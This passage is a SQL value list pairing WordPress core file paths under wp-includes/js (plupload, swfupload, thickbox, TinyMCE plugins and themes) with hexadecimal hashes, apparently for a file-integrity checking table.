(0xfb4481cf10e1ea5de69f7cdfbcaa2499, 'wp-includes/js/mediaelement/wp-mediaelement.js', 1, 0x00000000000000000000000000000000, 0x4e654df64f6c6971d29676c04eb5481a),
(0x8d119bc3d389cf323f3362bc29982e18, 'wp-includes/js/plupload/changelog.txt', 1, 0x00000000000000000000000000000000, 0x01928d3405b7c4b0d5f82e1c8e1b4ac1),
(0x4a10fe890c455ba57f3755d2d31aef7e, 'wp-includes/js/plupload/handlers.js', 1, 0x00000000000000000000000000000000, 0x878e0b76338a31dd288a1ed089cb6a4f),
(0x8fdc3b28587060d299d6ec9170ddb708, 'wp-includes/js/plupload/handlers.min.js', 1, 0x00000000000000000000000000000000, 0x7f22f0ade68c07f94df3b40a9ab01632),
(0xcc568ddaae999cc612ea4dafe96ad381, 'wp-includes/js/plupload/license.txt', 1, 0x00000000000000000000000000000000, 0x751419260aa954499f7abaabaa882bbe),
(0x404172650a1f3473423476e610507691, 'wp-includes/js/plupload/plupload.flash.js', 1, 0x00000000000000000000000000000000, 0x7bc0ee636b3b83484fc3b9348863bd22),
(0xc343b6339d213051f26f954abf652060, 'wp-includes/js/plupload/plupload.flash.swf', 1, 0x00000000000000000000000000000000, 0xed20d984b757ad5291963389fc209864),
(0x32794b513520037c1552b351289ca518, 'wp-includes/js/plupload/plupload.html4.js', 1, 0x00000000000000000000000000000000, 0x5f70abca09e28bbde851a604ebd9e76f),
(0x4d4d8262b235f772e005a76dde28cd2a, 'wp-includes/js/plupload/plupload.html5.js', 1, 0x00000000000000000000000000000000, 0x3fbc939309e4ab58452cd744892ab575),
(0xdf94bfcfcb198a8b9c487f8975d426e1, 'wp-includes/js/plupload/plupload.js', 1, 0x00000000000000000000000000000000, 0x9b4c722c56b2a7fa041c7a50f7019801),
(0x69a948d616380981072304987ce59b4c, 'wp-includes/js/plupload/plupload.silverlight.js', 1, 0x00000000000000000000000000000000, 0x56cb2a0e7a1e792a1a803aa3a527d7d6),
(0x20e270283f516eed0788acd56181db5a, 'wp-includes/js/plupload/plupload.silverlight.xap', 1, 0x00000000000000000000000000000000, 0x40dbc8d7df259f4d2df35c89c63a818b),
(0x354382290a5775beeabd9d2f46d2634b, 'wp-includes/js/plupload/wp-plupload.js', 1, 0x00000000000000000000000000000000, 0xa9c4b3dcac8cb4cd962ee0e16cdf5f8c),
(0xff4cd9f3eaf3906535783f653de68826, 'wp-includes/js/plupload/wp-plupload.min.js', 1, 0x00000000000000000000000000000000, 0x80fca05c0bb63230df94b9868cc5fd30),
(0xec3fd8d4defdb7689bb10290d217ce3b, 'wp-includes/js/quicktags.js', 1, 0x00000000000000000000000000000000, 0x2a040163533eceee9b05c95216bf6764),
(0xdf8cf207912883a9a989d5db3281e1e8, 'wp-includes/js/quicktags.min.js', 1, 0x00000000000000000000000000000000, 0x5f7c8cb8f33b0e319d7ede4a8eb97ee3),
(0xcb8de547e4af806f1b65b7ffef6f9c1c, 'wp-includes/js/shortcode.js', 1, 0x00000000000000000000000000000000, 0x667dfe93afdf63592ca07ec403b05170),
(0x67f5e45d6252062588205a1d8ddb45ba, 'wp-includes/js/shortcode.min.js', 1, 0x00000000000000000000000000000000, 0x94f0a6572dc53376bc73c29e2dbc2d27),
(0xb54f97721023bdd4fd54ba478717bf21, 'wp-includes/js/swfobject.js', 1, 0x00000000000000000000000000000000, 0x9ffdba2cff497d701684657e329871f5),
(0xf2b096fc4dc2d9a64dc62f0c7f60bc18, 'wp-includes/js/swfupload/handlers.js', 1, 0x00000000000000000000000000000000, 0xc5d6929ea46dc1bb4ef8bffc17b3e819),
(0xc56023e3d8479662af43d0e51bd68ace, 'wp-includes/js/swfupload/handlers.min.js', 1, 0x00000000000000000000000000000000, 0x96592c6b3fad580ce04e12bc3047ef3b),
(0x9a1a2dae947837c3f92841c434f9bbe7, 'wp-includes/js/swfupload/license.txt', 1, 0x00000000000000000000000000000000, 0xcbe05bb060c85e07882dc06ff751577a),
(0xef443d4ac785122f13030936de836185, 'wp-includes/js/swfupload/plugins/swfupload.cookies.js', 1, 0x00000000000000000000000000000000, 0x7fa57ec00dda88dd6b5c2037ccb4d5cf),
(0xe7a96cda584e454d08ca43675673413a, 'wp-includes/js/swfupload/plugins/swfupload.queue.js', 1, 0x00000000000000000000000000000000, 0x9953522fbd4a1b02bbf635a92d76cd8f),
(0x2c42da030c63c5ddd6d49b5af90e3459, 'wp-includes/js/swfupload/plugins/swfupload.speed.js', 1, 0x00000000000000000000000000000000, 0x415a3787846bb6c2d745602c2afb73ac),
(0xb9f924cb3c40e399c59861f4abd56322, 'wp-includes/js/swfupload/plugins/swfupload.swfobject.js', 1, 0x00000000000000000000000000000000, 0xccb51571a75637db08545caaf2ed9e73),
(0x8ac124a1d6784d313ee8b25f3850000b, 'wp-includes/js/swfupload/swfupload.js', 1, 0x00000000000000000000000000000000, 0x603bd14299f61a7329b2d353b2b56c2f),
(0x2a7424aadf8b76c3d16ee58116dd73f1, 'wp-includes/js/swfupload/swfupload.swf', 1, 0x00000000000000000000000000000000, 0xbd5a25f23589652ca472d41fe1484f0c),
(0xc2fd0931aa07f5d090e3808581533a28, 'wp-includes/js/thickbox/loadingAnimation.gif', 1, 0x00000000000000000000000000000000, 0xce2268030dd2151b63cdf4ffc2f626ba),
(0xe9d4dee27493fe985a01d14f2783200a, 'wp-includes/js/thickbox/macFFBgHack.png', 1, 0x00000000000000000000000000000000, 0x189217c8b067ef86add757922c2f75b4),
(0x80c1b67a2882dc3a7926d7d31424e61c, 'wp-includes/js/thickbox/tb-close-2x.png', 1, 0x00000000000000000000000000000000, 0xae65a3a2de0cb24ecef3065a1618fdac),
(0x8cfa70f94b424dd87f9e293cfa4ece29, 'wp-includes/js/thickbox/tb-close.png', 1, 0x00000000000000000000000000000000, 0x19efae1b275c9c70a783799e259e059e),
(0x92767b4cf64a6cc58d80597ad560b028, 'wp-includes/js/thickbox/thickbox.css', 1, 0x00000000000000000000000000000000, 0xb1dcb13562cf13a93d4ddf10a7c6d787),
(0x411945b6fb1ff4115b80608c11b78195, 'wp-includes/js/thickbox/thickbox.js', 1, 0x00000000000000000000000000000000, 0x43e846c82d0eb2e54e55f9bd5b0cd4dd),
(0x393af99764af6f0a91f070605279a8a2, 'wp-includes/js/tinymce/langs/wp-langs-en.js', 1, 0x00000000000000000000000000000000, 0x260c1cc4baa6208fad1e01788c56e30b),
(0x2b15a2dedd3914b0b585ca927163487d, 'wp-includes/js/tinymce/langs/wp-langs.php', 1, 0x00000000000000000000000000000000, 0x594203a3e68c96250c775f804fb35042),
(0x970976be134f2e04847cdfa417d2b582, 'wp-includes/js/tinymce/license.txt', 1, 0x00000000000000000000000000000000, 0x045d04e17422d99e338da75b9c749b7c),
(0xd8f9841bbcd8526668131c3129bb450a, 'wp-includes/js/tinymce/mark_loaded_src.js', 1, 0x00000000000000000000000000000000, 0xe44f09fb83377ffdc1157b458e43414f),
(0x409b24863656ccf5e779435bcb5b9cf5, 'wp-includes/js/tinymce/plugins/directionality/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xe2d925fe1e778dbcade06d55164fc276),
(0xbdfdc98df523aa4c06dbe3c12e94aa7e, 'wp-includes/js/tinymce/plugins/directionality/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x9da7f763c6a1f1b7fc61582e7d454cc3),
(0xd6002a4540faf73d071b55bb4f69ab82, 'wp-includes/js/tinymce/plugins/fullscreen/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x15134339e36472281b8a1626233f747d),
(0x86059134949fcb95c8f3bbf726a37ccc, 'wp-includes/js/tinymce/plugins/fullscreen/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0xdae63ddab5c4a9fee69fe36e4f2558a3),
(0xca96d50a648ad93f378e757267328c06, 'wp-includes/js/tinymce/plugins/fullscreen/fullscreen.htm', 1, 0x00000000000000000000000000000000, 0xd21fc65b8aade703572c6f396e475118),
(0x95314fd1e9ff2306b4735de4adaaa795, 'wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xcbfebda03eef4bd608a86827948c4224),
(0x1cba04ca816cad90a8b0e95f908fe0ec, 'wp-includes/js/tinymce/plugins/inlinepopups/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x50960b97a8030fd80d582166fef4ab57),
(0xbfb1552dfc17982b869d25560292f41d, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/alert.gif', 1, 0x00000000000000000000000000000000, 0x568d4cf84413656fb72fe39d1dd60f8d),
(0xa343e11dfd337116fd9ead206d8d5b2e, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/button.gif', 1, 0x00000000000000000000000000000000, 0x19f864cb81177840dcd534df4d537ea3),
(0x2947cf908f1fcdbee12d707ae15306ac, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/buttons.gif', 1, 0x00000000000000000000000000000000, 0x2e101a4aa637bfd16cef7e763e8c2eed),
(0x0aa3dcd77f72b7d4e48410f7a7a17e10, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/confirm.gif', 1, 0x00000000000000000000000000000000, 0x1bc337a20c319e531cda6ced531827d0),
(0x4551e5637a35c033ff04c6ea652de0bf, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/corners.gif', 1, 0x00000000000000000000000000000000, 0x55298b5baaecb7e06a251db9f0a4b14c),
(0xb0d2e937886af4d34811f904539f338d, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/drag.gif', 1, 0x00000000000000000000000000000000, 0x5847788e8ae098dd7fc3bdbe1a084da6),
(0x59aaff9a63823c2f677b3c3692e17395, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/horizontal.gif', 1, 0x00000000000000000000000000000000, 0x0365e75dd4a9ad61dc98dcb641207c21),
(0xa9264ec39e35880ac1487e1e2e662005, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/vertical.gif', 1, 0x00000000000000000000000000000000, 0x0261136fac58ce77bdbd96aa0194947e),
(0xb95e61ff47dbfb9018b92af546d4f0da, 'wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/window.css', 1, 0x00000000000000000000000000000000, 0xdb6490f7f7b6a4e9470eab0856c3122a),
(0x329884552c6b21f04e15342c2126eaf9, 'wp-includes/js/tinymce/plugins/inlinepopups/template.htm', 1, 0x00000000000000000000000000000000, 0x31a49baf85e588fb217390f950e775e5),
(0x9980b17bd1b4a5485b5a956b3f7399da, 'wp-includes/js/tinymce/plugins/media/css/media.css', 1, 0x00000000000000000000000000000000, 0x4e29dd1bf318a62f0b5d39dc610e5f82),
(0x6aa9e24bff5df1c612e2d9fc75ec9f03, 'wp-includes/js/tinymce/plugins/media/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x5ad7db86c5008f98ec135595db4a4973),
(0x0dd9753fd2b69ed4790243df7a9bc1f9, 'wp-includes/js/tinymce/plugins/media/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x3f0d7eef1ba22024488ddffcb3bb0e55),
(0xec7e8d360a65a05a527016a7429bcda7, 'wp-includes/js/tinymce/plugins/media/js/embed.js', 1, 0x00000000000000000000000000000000, 0x5df3783492b848adde42124a1e9cf383),
(0xfad15c6e0bfc4b1ee97eada7ea17d536, 'wp-includes/js/tinymce/plugins/media/js/media.js', 1, 0x00000000000000000000000000000000, 0x1c9dba9ba82579d5e865bbd33e325354),
(0xa1395a96caedf000212350e7457277e7, 'wp-includes/js/tinymce/plugins/media/media.htm', 1, 0x00000000000000000000000000000000, 0x45d4c170a335c40f431569802a2f0e18),
(0xa0a5645d0046d6186d081fc5b270b244, 'wp-includes/js/tinymce/plugins/media/moxieplayer.swf', 1, 0x00000000000000000000000000000000, 0x9217cea72c76c361fa5033526712284e),
(0xa03a5e9938d72dbef317847f67d367f9, 'wp-includes/js/tinymce/plugins/paste/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xe7e3089339dc85691bed70d81734accd),
(0x3015a6576f6eb2bbfb0aa338ad63a350, 'wp-includes/js/tinymce/plugins/paste/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x2a403fc1f292458b7e9a323901e9d171),
(0xeb18612186a7647fedd84ded9024a017, 'wp-includes/js/tinymce/plugins/paste/js/pastetext.js', 1, 0x00000000000000000000000000000000, 0x69ba0c60f23785b0c60e56b1919e53fa),
(0xf3424bbcc859f1a7ab728fc75bc5491e, 'wp-includes/js/tinymce/plugins/paste/js/pasteword.js', 1, 0x00000000000000000000000000000000, 0x10f73efbf570633989e2801d0b10de4f),
(0x688574570eed85974af87fcfc4be2c16, 'wp-includes/js/tinymce/plugins/paste/pastetext.htm', 1, 0x00000000000000000000000000000000, 0xe8598b664a0f4578a88c7c34e46c029d),
(0xb301c24ad5fd0a5965b0bf9af09e475e, 'wp-includes/js/tinymce/plugins/paste/pasteword.htm', 1, 0x00000000000000000000000000000000, 0x75afde509924223eab0c0b2535141192),
(0xa8ae059b66d31e2f6bbff67a283d8c09, 'wp-includes/js/tinymce/plugins/spellchecker/changelog.txt', 1, 0x00000000000000000000000000000000, 0xb37d71f086003790ea5bb7bb390b6514),
(0x89df38c55bb21221d98a16fd790e809e, 'wp-includes/js/tinymce/plugins/spellchecker/classes/EnchantSpell.php', 1, 0x00000000000000000000000000000000, 0x73359eb4908d5d809dd0acb38a71de3e),
(0xed296ba5b3181fecc49ad8f6849a3a59, 'wp-includes/js/tinymce/plugins/spellchecker/classes/GoogleSpell.php', 1, 0x00000000000000000000000000000000, 0x734e4701bd10058815f41a0b2048c8a1),
(0x3ce434b84dee10e7798d0f178cf9c494, 'wp-includes/js/tinymce/plugins/spellchecker/classes/PSpell.php', 1, 0x00000000000000000000000000000000, 0xdbc6556b5e976cbe545a0760c16d4ab9),
(0x541809ec2ed04958adf4bc96c5bd4949, 'wp-includes/js/tinymce/plugins/spellchecker/classes/PSpellShell.php', 1, 0x00000000000000000000000000000000, 0x4aed5c3080f34ad658afd43c0b88954a),
(0x108a396a35cfa952472fe09ec46df2f7, 'wp-includes/js/tinymce/plugins/spellchecker/classes/SpellChecker.php', 1, 0x00000000000000000000000000000000, 0x69d90a002a9989573165fb83891f83df),
(0xfa6e3f1cacca3a5bcea97e8119aafb69, 'wp-includes/js/tinymce/plugins/spellchecker/classes/utils/JSON.php', 1, 0x00000000000000000000000000000000, 0x0a1ce8027621826c5c2f8c086c4ae76a),
(0xc55a444a4d250a4d52a4346e49241fbd, 'wp-includes/js/tinymce/plugins/spellchecker/classes/utils/Logger.php', 1, 0x00000000000000000000000000000000, 0x317dfd9569fb1169121809b4b7bcf36e),
(0x85d0cbbdf216e9325cd922b29e895101, 'wp-includes/js/tinymce/plugins/spellchecker/config.php', 1, 0x00000000000000000000000000000000, 0x8dc03affc6d444743cb4adef65abef5b),
(0xb8b07a70ea14fffb48d9a75a01fa053d, 'wp-includes/js/tinymce/plugins/spellchecker/css/content.css', 1, 0x00000000000000000000000000000000, 0xd236d4333281b4eae7a1e2b514b691f4),
(0x3f9cea8cb89c3cf6db34edef8ee1887d, 'wp-includes/js/tinymce/plugins/spellchecker/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x629a571ee7686ace6ee7ad1181be916b),
(0x1a5de4ad61325e2bb6c5af8d1c255359, 'wp-includes/js/tinymce/plugins/spellchecker/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x8b752a82741c05573b7591571a73238a),
(0xef25aee1f86f6a0262f9ebe7afbc4ec9, 'wp-includes/js/tinymce/plugins/spellchecker/img/wline.gif', 1, 0x00000000000000000000000000000000, 0xc136c9f8e00718a98947a21d8adbcc56),
(0x1fda076180615936bbdbec2c0ad08439, 'wp-includes/js/tinymce/plugins/spellchecker/includes/general.php', 1, 0x00000000000000000000000000000000, 0xf3058fa03049104b293ed36be1039010),
(0x6b820019e9c6b72bf0f6a86d20645e89, 'wp-includes/js/tinymce/plugins/spellchecker/rpc.php', 1, 0x00000000000000000000000000000000, 0x3281306328b00fda149f131b601b19e8),
(0xb673e1de2fbddae2d21c9298a7b067f5, 'wp-includes/js/tinymce/plugins/tabfocus/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xd3e5ef7a1a203516af0d8fdf94952fd2),
(0xbfbaf377ebc30b196ed35781e8800489, 'wp-includes/js/tinymce/plugins/tabfocus/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x12889ccf8caf1d466859ba949f52fbca),
(0xfffccae356434455c0bfb3db5f04f60c, 'wp-includes/js/tinymce/plugins/wordpress/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xa3d703f0f3b6c2171edea4410ec478b5),
(0x65e02f9cc5c622366270d0a12d457af2, 'wp-includes/js/tinymce/plugins/wordpress/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0xa7d139d6d9506e005e7aee90d5c7918b),
(0xb4664a09c9012f8809a82bcb48f3481d, 'wp-includes/js/tinymce/plugins/wordpress/img/audio.gif', 1, 0x00000000000000000000000000000000, 0xedc58dce8aab5d12e83fd4aac849cc05),
(0x3efbd5b71e5c6e2207c6bc141ffd4664, 'wp-includes/js/tinymce/plugins/wordpress/img/image.gif', 1, 0x00000000000000000000000000000000, 0xfe5bd0edc99f44dfe3ec2302359a7f81),
(0x4fe8a5a30d4c2b43ae793030a45bf3b9, 'wp-includes/js/tinymce/plugins/wordpress/img/media.gif', 1, 0x00000000000000000000000000000000, 0xb1a62e29a44128ae7a3d932b4941ea33),
(0x2ca21a7e6dd79c0d15e1ad343b2ec485, 'wp-includes/js/tinymce/plugins/wordpress/img/page.gif', 1, 0x00000000000000000000000000000000, 0xec8d1ed1b0fd137cacdda9e316ebed31),
(0x93c7dba46ff8af3f14756ce8dd11eb19, 'wp-includes/js/tinymce/plugins/wordpress/img/trans.gif', 1, 0x00000000000000000000000000000000, 0x12bf9e19374920de3146a64775f46a5e),
(0xf90a99c2fe30d4d04bb7f3f8ee77dc39, 'wp-includes/js/tinymce/plugins/wordpress/img/video.gif', 1, 0x00000000000000000000000000000000, 0x233f9a78eadddb26f8976682e6d1bf44),
(0x6783b9de12b8e1c6423666d94d1a1ec4, 'wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x7bb6e432495c6711766e3c395ee95b01),
(0xb70b5c74bb897716fa5d5eea8e396f3c, 'wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0xa6438b9df6aa7af17ad9c1ca2019d014),
(0x935720f4793c17c33103c1d90625664c, 'wp-includes/js/tinymce/plugins/wpdialogs/js/popup.js', 1, 0x00000000000000000000000000000000, 0x6ceb647592588bcf463befd9408e27ad),
(0x8bbcd8cf914a5b564e6b2918e0b04acc, 'wp-includes/js/tinymce/plugins/wpdialogs/js/popup.min.js', 1, 0x00000000000000000000000000000000, 0x63b0aed9b02f879a6e0295fbea7db854),
(0x397042c9bef039c730e039b0adb4ecef, 'wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.js', 1, 0x00000000000000000000000000000000, 0xa385e127675754d68ba3ee7f2e52000c),
(0x981bffb3a4c6e30fd1bb53aba5ed617f, 'wp-includes/js/tinymce/plugins/wpdialogs/js/wpdialog.min.js', 1, 0x00000000000000000000000000000000, 0x11c54c73d65807fda84de489cc293213),
(0x6472a8f8b2d97d503930adce8f002d8e, 'wp-includes/js/tinymce/plugins/wpeditimage/css/editimage.css', 1, 0x00000000000000000000000000000000, 0xbe84c8843d5da59cde1aaa472acf86a6),
(0xe1e00ff441d56aea6f66529730ba0dcf, 'wp-includes/js/tinymce/plugins/wpeditimage/editimage.html', 1, 0x00000000000000000000000000000000, 0x216788f7dbe172a3d3fb827a05d0f837),
(0x2351ac3d0d6694984811c0f95dd73d40, 'wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x02ed0a4f130b11ee395676d0e26171b8),
(0xe432c6e491a772e7dd501d23f04ed4ae, 'wp-includes/js/tinymce/plugins/wpeditimage/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x5d01c0e812cdcd6356b78ee0cb4e5426),
(0xf52253c2bb0f6465b26a9348b9794fb9, 'wp-includes/js/tinymce/plugins/wpeditimage/img/delete-2x.png', 1, 0x00000000000000000000000000000000, 0xfc29fcdb63500be0c6096b4621840f24),
(0x51116e205abb552794e0c44275a262ae, 'wp-includes/js/tinymce/plugins/wpeditimage/img/delete.png', 1, 0x00000000000000000000000000000000, 0x6de18e0045263b20400e284eb2731939),
(0xbec17c9665146eab547c60962c797049, 'wp-includes/js/tinymce/plugins/wpeditimage/img/image-2x.png', 1, 0x00000000000000000000000000000000, 0xe122da77cc3ef946e42cf76288800cba),
(0x7b86d51235286dbfc47c5b2c719972ca, 'wp-includes/js/tinymce/plugins/wpeditimage/img/image.png', 1, 0x00000000000000000000000000000000, 0x528e8e81d99bf63d0b7f88bdd0051d3a),
(0x53ab67e54979018b2bfe7a2557a05838, 'wp-includes/js/tinymce/plugins/wpeditimage/js/editimage.js', 1, 0x00000000000000000000000000000000, 0xdecdce43a5ea753c53801b436614249e),
(0x0cc849dab3f99faaf09db9944c05e499, 'wp-includes/js/tinymce/plugins/wpfullscreen/css/wp-fullscreen.css', 1, 0x00000000000000000000000000000000, 0xde3ad9d8c97491f41feaaf5d5d4d60b5),
(0x925d384509fdf86221157f9d754ff228, 'wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xc3920f8399e5369fa7477612b192a85b),
(0x0e34d9596f858ace08ba72809427a305, 'wp-includes/js/tinymce/plugins/wpfullscreen/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0xa5356abede54850eae9c4444bb914750),
(0x59bd4221e6ff891756ae8591f93d5486, 'wp-includes/js/tinymce/plugins/wpgallery/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x625f3147b42809ded504e0aaba0d69e4),
(0xbcdc55debccdf92d42a44d11491b3760, 'wp-includes/js/tinymce/plugins/wpgallery/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0x1b2c3742258f2159bfe1c3d5bd3c3d25),
(0x7846fe20d35e0473abf5ee06962c8346, 'wp-includes/js/tinymce/plugins/wpgallery/img/delete-2x.png', 1, 0x00000000000000000000000000000000, 0xfc29fcdb63500be0c6096b4621840f24),
(0xa1dd0258c6ac79c0ce74b8bf29e9bcc9, 'wp-includes/js/tinymce/plugins/wpgallery/img/delete.png', 1, 0x00000000000000000000000000000000, 0x6de18e0045263b20400e284eb2731939),
(0x2ecd117646259595f00cdac8a0918c6e, 'wp-includes/js/tinymce/plugins/wpgallery/img/edit-2x.png', 1, 0x00000000000000000000000000000000, 0x55706c78fac741908045b68213df637f),
(0xcb8177d1243c1bb93aa12f52cc6bb6f9, 'wp-includes/js/tinymce/plugins/wpgallery/img/edit.png', 1, 0x00000000000000000000000000000000, 0x42a45087214d7c886a308fd83406d60d),
(0x5d4d5c002b072fcccf2714f64cb89324, 'wp-includes/js/tinymce/plugins/wpgallery/img/t.gif', 1, 0x00000000000000000000000000000000, 0x12bf9e19374920de3146a64775f46a5e),
(0xea1cba8598b6f44d4a21656734a1ce7d, 'wp-includes/js/tinymce/plugins/wplink/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0xe598b8a8f94830e55c044ee7b6dd7bf0),
(0x3f9c417330955a54607a22a7fbec7aa4, 'wp-includes/js/tinymce/plugins/wplink/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0xbfcceea9af0abd6cca120cbdd76af2f2),
(0xc80763cd64de10750e77a01e1c4b5d69, 'wp-includes/js/tinymce/plugins/wpview/editor_plugin.js', 1, 0x00000000000000000000000000000000, 0x3498b476348ae4d361dc02e197203990),
(0x7a56b0a9496023eeea27e1f201d44d34, 'wp-includes/js/tinymce/plugins/wpview/editor_plugin_src.js', 1, 0x00000000000000000000000000000000, 0xfdfef23447596978a7af1c589a704bd3),
(0xd0fe6d600188dfca65d9fcfca86caf8e, 'wp-includes/js/tinymce/themes/advanced/about.htm', 1, 0x00000000000000000000000000000000, 0x742d8c3e934a99a6b55ddc1f9f0eb71d),
(0xc232c25c8f2c4a54656cd61d76b30499, 'wp-includes/js/tinymce/themes/advanced/anchor.htm', 1, 0x00000000000000000000000000000000, 0xd39a84bbf89e1dbc300f44d4c6eff520),
(0x649d3082037c8e5486229bfe9eb72e62, 'wp-includes/js/tinymce/themes/advanced/charmap.htm', 1, 0x00000000000000000000000000000000, 0xe78d30352be54ce072b327c3f3ae5a1e),
(0x1e8ee17650ce7ab6f6fac784a09c0b0a, 'wp-includes/js/tinymce/themes/advanced/color_picker.htm', 1, 0x00000000000000000000000000000000, 0x7fccf0616c87a689f089433a68141979),
(0x68cc4446c4f54944f3d00fba61acde09, 'wp-includes/js/tinymce/themes/advanced/editor_template.js', 1, 0x00000000000000000000000000000000, 0xa2b3085f0ab3c323dd28187b739139ec),
(0x2df4e653b2fc7d2e1e189f55a9996f0f, 'wp-includes/js/tinymce/themes/advanced/editor_template_src.js', 1, 0x00000000000000000000000000000000, 0xebe2e88379da04870256a02af4d11660),
(0x4540680e268e194c4e92f80a195e7909, 'wp-includes/js/tinymce/themes/advanced/image.htm', 1, 0x00000000000000000000000000000000, 0x7a6c90019843b98b685e2822412b6bcb),
(0xf195cf17c64222be6e786967af91675f, 'wp-includes/js/tinymce/themes/advanced/img/colorpicker.jpg', 1, 0x00000000000000000000000000000000, 0x9bcc36292defe94bca5a013a1736c7d7),
(0x6100a71309607bf1c46585799f113187, 'wp-includes/js/tinymce/themes/advanced/img/flash.gif', 1, 0x00000000000000000000000000000000, 0x33adee48d32bbbba3e6412cc54ecf335),
(0xea6f5aaae87f39f0c06975c13fc7a450, 'wp-includes/js/tinymce/themes/advanced/img/gotmoxie.png', 1, 0x00000000000000000000000000000000, 0xd97b715d73a13adef309a8a7103acb45),
(0x44c9a94ee2ea4b9a4085414d16bfdca8, 'wp-includes/js/tinymce/themes/advanced/img/icons.gif', 1, 0x00000000000000000000000000000000, 0x75ad72872bc6280c32609e12fc3b610a),
(0xb6ef92460ef6928e67671517cae35cca, 'wp-includes/js/tinymce/themes/advanced/img/iframe.gif', 1, 0x00000000000000000000000000000000, 0xa1af02e9ba370f64297087b46e80591e),
(0xcc763dffb5c29acd2d51a0b256b5718b, 'wp-includes/js/tinymce/themes/advanced/img/pagebreak.gif', 1, 0x00000000000000000000000000000000, 0x48872075f721bf57a517e3275d61c0ba),
(0x23c19635c09ac295bfb497cd3d5d728d, 'wp-includes/js/tinymce/themes/advanced/img/quicktime.gif', 1, 0x00000000000000000000000000000000, 0x61da1ff8729ca5016344c4e8eb173369),
(0x6ae126eca1a0eb8cde2ff184c483654c, 'wp-includes/js/tinymce/themes/advanced/img/realmedia.gif', 1, 0x00000000000000000000000000000000, 0xb9734ee16d790e67bea01046feba28b7),
(0x11a6b3ad502e2144451b4ea9070e311d, 'wp-includes/js/tinymce/themes/advanced/img/shockwave.gif', 1, 0x00000000000000000000000000000000, 0x1ce7d48784981aac9d4375cf2effdc4d),
(0xb361293092f0fd5e077a10367d40c8f6, 'wp-includes/js/tinymce/themes/advanced/img/trans.gif', 1, 0x00000000000000000000000000000000, 0x12bf9e19374920de3146a64775f46a5e),
(0xb7fc64563cae04c43c2da093aa22d3da, 'wp-includes/js/tinymce/themes/advanced/img/video.gif', 1, 0x00000000000000000000000000000000, 0xf85c56813ea016a75e496bba50d66ab4),
(0xaf2af3d92a6e4da4cc060a4d4dfd66de, 'wp-includes/js/tinymce/themes/advanced/img/windowsmedia.gif', 1, 0x00000000000000000000000000000000, 0xc327cd167b3a7bc263d908b0d0154ead),
(0x8baa09f3eced58ffbebe55337689b17b, 'wp-includes/js/tinymce/themes/advanced/js/about.js', 1, 0x00000000000000000000000000000000, 0x4ae895d8be28f8b94dd4f5d206cd7d59),
(0xc2f3c0e5db270d3461a071d0226e7930, 'wp-includes/js/tinymce/themes/advanced/js/anchor.js', 1, 0x00000000000000000000000000000000, 0xf69b824ff2b94f22713614c2dc5992e0),
(0x4d2845121a77cc8988013a7d12d7a4d8, 'wp-includes/js/tinymce/themes/advanced/js/charmap.js', 1, 0x00000000000000000000000000000000, 0x23e6f0fdded2c9fd69ba1fd7d69f559a),
(0x26b99436067fb16c2ac429df927e6519, 'wp-includes/js/tinymce/themes/advanced/js/color_picker.js', 1, 0x00000000000000000000000000000000, 0xcfc0f59a846661e748cae1c0adca77dc),
(0x0f59edf9f4a8b9e307bc1e4010334ef0, 'wp-includes/js/tinymce/themes/advanced/js/image.js', 1, 0x00000000000000000000000000000000, 0x8d2c4871c2b431d003267d1ecebfecde),
(0xa00e2614edca1466cf940f58b419cdfc, 'wp-includes/js/tinymce/themes/advanced/js/link.js', 1, 0x00000000000000000000000000000000, 0x316da7ee59e094228df2a4fb7e39cfa6),
(0x875d72cc677ee5b214e1d905622faef8, 'wp-includes/js/tinymce/themes/advanced/js/source_editor.js', 1, 0x00000000000000000000000000000000, 0x2a9abbfa6e2ade2906839928c6728d0a),
(0xdbb8e9770d2fb87d8021366218de0b1f, 'wp-includes/js/tinymce/themes/advanced/link.htm', 1, 0x00000000000000000000000000000000, 0x73d4ffe078d60f5d63452e2c3e95182b),
(0x5b336d954b37583b7695bb93e37151cb, 'wp-includes/js/tinymce/themes/advanced/shortcuts.htm', 1, 0x00000000000000000000000000000000, 0x9c5c4d7c3345923401c87d000c16fffc),
